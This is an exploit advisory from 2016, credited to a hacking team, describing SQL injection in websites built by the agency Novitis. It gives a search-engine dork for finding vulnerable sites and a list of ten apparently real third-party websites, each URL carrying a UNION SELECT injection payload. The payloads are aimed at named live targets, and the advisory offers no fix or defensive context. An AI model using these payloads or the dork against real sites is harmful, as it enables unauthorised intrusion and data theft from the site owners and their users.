[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] Exploit Title : Novitis SQL Injection
[*]
[*] Exploit Author : Ashiyane Digital Security Team
[*]
[*] Dork : ©Development & Design by Novitis inurl:id_page-
[*]
[*] Vendor Homepage : http://www.novitis.com/
[*]
[*] Date : 23.5.2016
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] Demo :
[*]
[*] http://www.novitis.co/index/pages/id_page-25 and 0 union select 1,2,version(),4,5,6,7,8,9,10 --+
[*]
[*] http://www.europex.org/index/pages/id_page-9 and 0 union select 1,2,3,4,5,version(),7 --+
[*]
[*] http://www.palaisdescotillons.com/index/pages/id_page-16 and 0 union select 1,2,3,4,5,version(),7 --+
[*]
[*] http://www.excelsusscientific.com/index/pages/id_page-18 and 0 union select 1,2,version(),4,5,6,7,8,9,10 --+
[*]
[*] http://www.puttinggolfstudio.com/index/pages/id_page-1 and 0 union select 1,2,3,version(),5,6,7,8,9,10 --+
[*]
[*] http://www.meublia.be/index/contact/id_page-3 union select version(),2,3,4,5,6,7,8,9,10 --+
[*]
[*] http://www.coachingforlawyers.eu/index/pages/id_page-84 and 0 union select version(),2,3,4,5,6,7,8,9,10 --+
[*]
[*] http://www.euroltra.eu/index/pages/id_page-60 and 0 union select version(),2,3,4,5,6,7,8,9,10 --+
[*]
[*] http://www.bsgms.org/index/pages/id_page-35 and 0 union select version(),2,3,4,5,version(),7 --+
[*]
[*] http://www.valentinbelgium.be/index/pages/id_page-16 and 0 union select version(),2,3,4,5,6,7,8,9,10 --+
[*]
[*] ,....
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] SPT To : Mahdi.Hidden , B14CK-SPID3R
[*] Discovered by : Saeid_9n
[*] Mail : nautilos1986@gmail.com
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]